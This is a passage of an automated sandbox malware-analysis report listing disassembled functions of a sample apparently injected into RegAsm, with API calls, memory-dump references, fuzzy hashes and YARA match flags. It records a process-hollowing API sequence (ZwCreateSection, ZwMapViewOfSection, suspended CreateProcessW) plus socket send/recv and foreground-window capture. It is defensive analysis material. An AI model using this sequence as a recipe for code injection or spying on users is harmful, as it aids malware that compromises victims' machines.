                                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                          • _free.LIBCMT ref: 10006CD7
                                          • _free.LIBCMT ref: 10006D0D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                          Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 2279764990-0
                                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                          Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEventStartupsocket
                                          • String ID:
                                          • API String ID: 1953588214-0
                                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                          Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                          • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                          Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                          Download Yara Rule
                                          APIs
                                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                          • String ID:
                                          • API String ID: 3750050125-0
                                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                          Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ForegroundText
                                          • String ID:
                                          • API String ID: 29597999-0
                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                          Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                          • String ID:
                                          • API String ID: 1170566393-0
                                          • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                          • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                          • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                          • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                          Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                          • String ID:
                                          • API String ID: 806969131-0
                                          • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                          • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                          • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                          • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                          Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                          • String ID:
                                          • API String ID: 806969131-0
                                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                          Function 004185A3 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                            • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                            • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                          • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                          • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                          • String ID:
                                          • API String ID: 2948481953-0
                                          • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                          • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                          • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                          • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                          Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: __crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 3768137683-0
                                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                          Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                          • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                          • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                          • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                          Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm
                                          • String ID:
                                          • API String ID: 65215352-0
                                          • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                          • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                          • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                          • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                          Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                          Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                          • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                          • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                          • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                          Function 00418691 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FromGdipImageLoadStream
                                          • String ID:
                                          • API String ID: 3292405956-0
                                          • Opcode ID: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                                          • Instruction ID: 43760c1b0819a338a5deeaaf53a1808d78fb0d0861515ad37458d280f23f523c
                                          • Opcode Fuzzy Hash: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                                          • Instruction Fuzzy Hash: B0D0C9B6514310AFC3619F04DC40AA2B7E8EB15312F11C82BA8D5C2620D7749C488B54
                                          Function 00418706 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GdipImageSaveStream
                                          • String ID:
                                          • API String ID: 971487142-0
                                          • Opcode ID: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                                          • Instruction ID: 4096a07c3c24ce64e1baa665156051a68d3341f73ff607d033811f23ed9a4a9b
                                          • Opcode Fuzzy Hash: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                                          • Instruction Fuzzy Hash: 12C0C932008351AB8B529F449C05C5FBAA6BB98211B044C1EF15541120CB258C659B5A
                                          Function 00404BE5 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                                          • Instruction ID: 9d5c7c84f515cf35c3e932a45e486dbb5327be38257a8aa591cdad7e466f248e
                                          • Opcode Fuzzy Hash: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                                          • Instruction Fuzzy Hash: 22C04CF1515200BFBA00CB60CD89C37B69DD750701715C8697908D2141D576DC01D538
                                          Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Deallocatestd::_
                                          • String ID:
                                          • API String ID: 1323251999-0
                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                          Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                          Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
